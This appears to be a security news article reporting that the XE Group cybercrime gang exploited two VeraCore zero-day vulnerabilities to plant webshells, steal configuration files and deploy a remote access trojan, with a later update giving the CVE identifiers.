Malware hunters have caught a known Vietnamese cybercrime gang called XE Group shifting tactics beyond credit card-skimming to exploiting at least two zero-day vulnerabilities in a widely deployed enterprise software product.
A joint investigation by researchers from Intezer and Solis Security is warning that XE Group targeted VeraCore, a platform used by fulfillment companies, commercial printers, and e-retailers to manage orders and operations. The investigators found evidence the group exploited two previously unknown vulnerabilities — one in upload validation and another in SQL processing — to gain and maintain unauthorized access.
According to a research paper, XE Group exploited two zero-day vulnerabilities in the VeraCore application to bypass security controls and deploy webshells to exfiltrate configuration files and move laterally within infected networks.
In an interesting twist the researchers found that the same system had been compromised before — in January 2020, attackers exploited a similar vulnerability, gaining valid credentials that later facilitated the reactivation of webshells in 2024.
Threat hunters have flagged the XE Group as a Vietnamese-origin cybercriminal threat actor typically seen hacking into externally facing services via known exploits and monetization of these compromises through installation of password theft or credit card skimming code for web services related to these servers
While the ganga has historically focused on credit card skimming and password theft, the research work from Intezer and Solis Security underscores a significant shift toward targeted information theft and supply chain attacks, specifically aimed at manufacturing and distribution sectors.
In the latest attacks, XE Group was seen exfiltrating web application configuration files, attempting to access remote systems, and deploying a Remote Access Trojan (RAT) using obfuscated PowerShell commands.
Intezer and Solis Security say they are currently working with affected vendors but note that there are no available CVE identifiers despite attempts at coordinated disclosure.
UPDATE (February 3; 4:00PM EST): The researchers have updated the bulletin with identifiers for the two VeraCore vulnerabilities: CVE-2024-57968 — Upload Validation Vulnerability and CVE-2025-25181 — SQL Injection.
Related: Cybercriminals, APT Exploited Telerik Vulnerability in Attacks on US Government Agency
Related: Dozens of Exploited Vulnerabilities Missing From CISA ‘Must Patch’ List
Related: Intezer Documents Powerful ‘Lightning Framework’ Linux Malware
Related: CISA Warns of Two Mitel Vulnerabilities Exploited in Wild
